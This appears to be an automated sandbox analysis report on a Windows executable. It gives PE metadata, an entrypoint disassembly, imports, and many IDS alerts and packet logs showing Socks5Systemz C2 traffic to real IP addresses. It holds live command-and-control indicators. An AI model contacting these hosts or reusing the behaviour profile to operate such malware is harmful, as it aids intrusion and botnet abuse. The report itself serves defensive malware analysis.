                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:1
                                                                              OS Version Minor:0
                                                                              File Version Major:1
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:1
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFC4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor eax, eax
                                                                              mov dword ptr [ebp-10h], eax
                                                                              mov dword ptr [ebp-24h], eax
                                                                              call 00007F564080B7CBh
                                                                              call 00007F564080C9D2h
                                                                              call 00007F564080CC61h
                                                                              call 00007F564080EC98h
                                                                              call 00007F564080ECDFh
                                                                              call 00007F564081160Eh
                                                                              call 00007F5640811775h
                                                                              xor eax, eax
                                                                              push ebp
                                                                              push 0040A2FCh
                                                                              push dword ptr fs:[eax]
                                                                              mov dword ptr fs:[eax], esp
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040A2C5h
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              mov eax, dword ptr [0040C014h]
                                                                              call 00007F56408121DBh
                                                                              call 00007F5640811E0Eh
                                                                              lea edx, dword ptr [ebp-10h]
                                                                              xor eax, eax
                                                                              call 00007F564080F2C8h
                                                                              mov edx, dword ptr [ebp-10h]
                                                                              mov eax, 0040CE24h
                                                                              call 00007F564080B877h
                                                                              push 00000002h
                                                                              push 00000000h
                                                                              push 00000001h
                                                                              mov ecx, dword ptr [0040CE24h]
                                                                              mov dl, 01h
                                                                              mov eax, 0040738Ch
                                                                              call 00007F564080FB57h
                                                                              mov dword ptr [0040CE28h], eax
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040A27Dh
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              call 00007F564081224Bh
                                                                              mov dword ptr [0040CE30h], eax
                                                                              mov eax, dword ptr [0040CE30h]
                                                                              cmp dword ptr [eax+0Ch], 01h
                                                                              jne 00007F564081238Ah
                                                                              mov eax, dword ptr [0040CE30h]
                                                                              mov edx, 00000028h
                                                                              call 00007F564080FF58h
                                                                              mov edx, dword ptr [00000030h]

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x110000x2c000x2c009c8c4c33acefca10e9f3baef184db4adFalse0.3230646306818182data4.463574542585288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                              RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                              RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                              RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                              RT_STRING0x125740x2f2data0.35543766578249336
                                                                              RT_STRING0x128680x30cdata0.3871794871794872
                                                                              RT_STRING0x12b740x2cedata0.42618384401114207
                                                                              RT_STRING0x12e440x68data0.75
                                                                              RT_STRING0x12eac0xb4data0.6277777777777778
                                                                              RT_STRING0x12f600xaedata0.5344827586206896
                                                                              RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                              RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                              RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2764900662251656
                                                                              RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                              Imports

                                                                              DLLImport
                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                              user32.dllMessageBoxA
                                                                              oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                              kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                              user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                              comctl32.dllInitCommonControls
                                                                              advapi32.dllAdjustTokenPrivileges

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              DutchNetherlands
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-08T04:13:52.485360+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663161185.208.158.24880TCP
                                                                              2024-10-08T04:13:55.430626+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663161185.208.158.24880TCP
                                                                              2024-10-08T04:13:56.276515+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663163185.208.158.24880TCP
                                                                              2024-10-08T04:13:57.075057+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663165185.208.158.24880TCP
                                                                              2024-10-08T04:13:57.430314+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663165185.208.158.24880TCP
                                                                              2024-10-08T04:13:58.256550+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663166185.208.158.24880TCP
                                                                              2024-10-08T04:13:59.060654+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663167185.208.158.24880TCP
                                                                              2024-10-08T04:13:59.411684+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663167185.208.158.24880TCP
                                                                              2024-10-08T04:14:00.235449+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663168185.208.158.24880TCP
                                                                              2024-10-08T04:14:00.578394+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663168185.208.158.24880TCP
                                                                              2024-10-08T04:14:01.398277+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663169185.208.158.24880TCP
                                                                              2024-10-08T04:14:02.218620+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663170185.208.158.24880TCP
                                                                              2024-10-08T04:14:02.562916+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663170185.208.158.24880TCP
                                                                              2024-10-08T04:14:02.906768+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663170185.208.158.24880TCP
                                                                              2024-10-08T04:14:03.256863+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663170185.208.158.24880TCP
                                                                              2024-10-08T04:14:04.056622+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663171185.208.158.24880TCP
                                                                              2024-10-08T04:14:04.879972+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663172185.208.158.24880TCP
                                                                              2024-10-08T04:14:05.706045+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663174185.208.158.24880TCP
                                                                              2024-10-08T04:14:06.546534+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663175185.208.158.24880TCP
                                                                              2024-10-08T04:14:07.381969+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663176185.208.158.24880TCP
                                                                              2024-10-08T04:14:08.204252+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663177185.208.158.24880TCP
                                                                              2024-10-08T04:14:09.014942+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663178185.208.158.24880TCP
                                                                              2024-10-08T04:14:09.364554+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663178185.208.158.24880TCP
                                                                              2024-10-08T04:14:10.181754+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663179185.208.158.24880TCP
                                                                              2024-10-08T04:14:10.981526+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663180185.208.158.24880TCP
                                                                              2024-10-08T04:14:11.334754+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663180185.208.158.24880TCP
                                                                              2024-10-08T04:14:12.145048+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663181185.208.158.24880TCP
                                                                              2024-10-08T04:14:13.116895+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663182185.208.158.24880TCP
                                                                              2024-10-08T04:14:13.930977+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663183185.208.158.24880TCP
                                                                              2024-10-08T04:14:14.737108+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663184185.208.158.24880TCP
                                                                              2024-10-08T04:14:15.553262+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663185185.208.158.24880TCP
                                                                              2024-10-08T04:14:16.375905+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663186185.208.158.24880TCP
                                                                              2024-10-08T04:14:17.180272+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663187185.208.158.24880TCP
                                                                              2024-10-08T04:14:18.027086+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663188185.208.158.24880TCP
                                                                              2024-10-08T04:14:18.857959+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663189185.208.158.24880TCP
                                                                              2024-10-08T04:14:19.213242+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663189185.208.158.24880TCP
                                                                              2024-10-08T04:14:20.022955+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663190185.208.158.24880TCP
                                                                              2024-10-08T04:14:20.839054+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663191185.208.158.24880TCP
                                                                              2024-10-08T04:14:21.653769+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663192185.208.158.24880TCP
                                                                              2024-10-08T04:14:22.003080+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663192185.208.158.24880TCP
                                                                              2024-10-08T04:14:22.835901+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663193185.208.158.24880TCP
                                                                              2024-10-08T04:14:23.663046+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663194185.208.158.24880TCP
                                                                              2024-10-08T04:14:24.482027+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663197185.208.158.24880TCP
                                                                              2024-10-08T04:14:24.831303+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663197185.208.158.24880TCP
                                                                              2024-10-08T04:14:25.643422+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663198185.208.158.24880TCP
                                                                              2024-10-08T04:14:26.470695+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663199185.208.158.24880TCP
                                                                              2024-10-08T04:14:27.282637+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663200185.208.158.24880TCP
                                                                              2024-10-08T04:14:28.102266+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663201185.208.158.24880TCP
                                                                              2024-10-08T04:14:29.224418+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663202185.208.158.24880TCP
                                                                              2024-10-08T04:14:30.061625+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663203185.208.158.24880TCP
                                                                              2024-10-08T04:14:30.418069+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663203185.208.158.24880TCP
                                                                              2024-10-08T04:14:31.234585+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663204185.208.158.24880TCP
                                                                              2024-10-08T04:14:31.579465+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663204185.208.158.24880TCP
                                                                              2024-10-08T04:14:32.416312+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663205185.208.158.24880TCP
                                                                              2024-10-08T04:14:33.254525+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663206185.208.158.24880TCP
                                                                              2024-10-08T04:14:34.223810+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663207185.208.158.24880TCP
                                                                              2024-10-08T04:14:35.057170+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663208185.208.158.24880TCP
                                                                              2024-10-08T04:14:35.885964+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663209185.208.158.24880TCP
                                                                              2024-10-08T04:14:36.696717+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663210185.208.158.24880TCP
                                                                              2024-10-08T04:14:37.500804+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663211185.208.158.24880TCP
                                                                              2024-10-08T04:14:37.843985+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663211185.208.158.24880TCP
                                                                              2024-10-08T04:14:38.666724+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663213185.208.158.24880TCP
                                                                              2024-10-08T04:14:39.488680+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663214185.208.158.24880TCP
                                                                              2024-10-08T04:14:40.324704+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663215185.208.158.24880TCP
                                                                              2024-10-08T04:14:40.675579+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663215185.208.158.24880TCP
                                                                              2024-10-08T04:14:41.513567+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663216185.208.158.24880TCP
                                                                              2024-10-08T04:14:41.861032+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663216185.208.158.24880TCP
                                                                              2024-10-08T04:14:42.705424+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663217185.208.158.24880TCP
                                                                              2024-10-08T04:14:43.540491+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663218185.208.158.24880TCP
                                                                              2024-10-08T04:14:44.378094+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663219185.208.158.24880TCP
                                                                              2024-10-08T04:14:45.232632+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663220185.208.158.24880TCP
                                                                              2024-10-08T04:14:45.583772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663220185.208.158.24880TCP
                                                                              2024-10-08T04:14:46.404938+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663221185.208.158.24880TCP
                                                                              2024-10-08T04:14:46.750961+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663221185.208.158.24880TCP
                                                                              2024-10-08T04:14:47.566653+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663222185.208.158.24880TCP
                                                                              2024-10-08T04:14:48.435341+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663223185.208.158.24880TCP
                                                                              2024-10-08T04:14:48.785107+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663223185.208.158.24880TCP
                                                                              2024-10-08T04:14:49.610149+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663224185.208.158.24880TCP
                                                                              2024-10-08T04:14:49.956149+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663224185.208.158.24880TCP
                                                                              2024-10-08T04:14:50.773595+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663225185.208.158.24880TCP
                                                                              2024-10-08T04:14:51.590209+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663226185.208.158.24880TCP
                                                                              2024-10-08T04:14:51.936933+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663226185.208.158.24880TCP
                                                                              2024-10-08T04:14:52.757844+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663227185.208.158.24880TCP
                                                                              2024-10-08T04:14:53.600074+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663228185.208.158.24880TCP
                                                                              2024-10-08T04:14:54.413726+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663229185.208.158.24880TCP
                                                                              2024-10-08T04:14:55.227231+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663230185.208.158.24880TCP
                                                                              2024-10-08T04:14:56.066016+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663231185.208.158.24880TCP
                                                                              2024-10-08T04:14:56.908568+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663232185.208.158.24880TCP
                                                                              2024-10-08T04:14:57.773482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663233185.208.158.24880TCP
                                                                              2024-10-08T04:14:58.597301+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663234185.208.158.24880TCP
                                                                              2024-10-08T04:14:59.420311+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663235185.208.158.24880TCP
                                                                              2024-10-08T04:15:00.249206+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663236185.208.158.24880TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 04:13:51.783178091 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:51.788131952 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:51.788233042 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:51.788804054 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:51.794524908 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:52.485299110 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:52.485327959 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:52.485359907 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:52.485395908 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:52.488603115 CEST631622023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:52.493393898 CEST20236316289.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:52.493545055 CEST631622023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:52.493545055 CEST631622023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:52.498408079 CEST20236316289.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:52.498846054 CEST631622023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:52.503654957 CEST20236316289.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:53.128714085 CEST20236316289.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:53.183809996 CEST631622023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:55.147404909 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.152460098 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:55.430424929 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:55.430625916 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.576559067 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.576950073 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.581861973 CEST8063161185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:55.581873894 CEST8063163185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:55.581928015 CEST6316180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.582087040 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.582179070 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:55.587107897 CEST8063163185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:56.276204109 CEST8063163185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:56.276515007 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.277729034 CEST631642023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:56.282672882 CEST20236316489.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:56.282862902 CEST631642023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:56.282862902 CEST631642023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:56.282862902 CEST631642023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:56.287781954 CEST20236316489.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:56.329900980 CEST20236316489.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:56.389578104 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.389895916 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.394680977 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:56.394700050 CEST8063163185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:56.394756079 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.394890070 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.394917965 CEST6316380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:56.399630070 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:56.744977951 CEST20236316489.105.201.183192.168.2.6
                                                                              Oct 8, 2024 04:13:56.745153904 CEST631642023192.168.2.689.105.201.183
                                                                              Oct 8, 2024 04:13:57.074873924 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:57.075057030 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.186307907 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.191292048 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:57.430228949 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:57.430314064 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.545627117 CEST6316580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.545911074 CEST6316680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.550702095 CEST8063166185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:57.550723076 CEST8063165185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:13:57.550772905 CEST6316680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:13:57.550800085 CEST6316580192.168.2.6185.208.158.248
